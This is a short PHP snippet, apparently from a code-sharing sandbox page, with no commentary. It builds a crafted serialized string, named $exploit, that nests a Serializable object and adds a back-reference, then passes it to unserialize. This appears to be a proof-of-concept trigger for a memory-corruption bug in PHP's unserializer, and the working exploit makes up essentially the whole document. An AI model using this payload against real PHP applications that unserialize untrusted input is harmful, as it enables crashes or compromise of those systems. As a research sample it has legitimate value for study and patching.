<?php class obj implements Serializable { public $data; } $object = new obj(); $object->data = 1; $inner = serialize($object); $exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; $data = unserialize($exploit); var_dump($data);
You have javascript disabled. You will not be able to edit any code.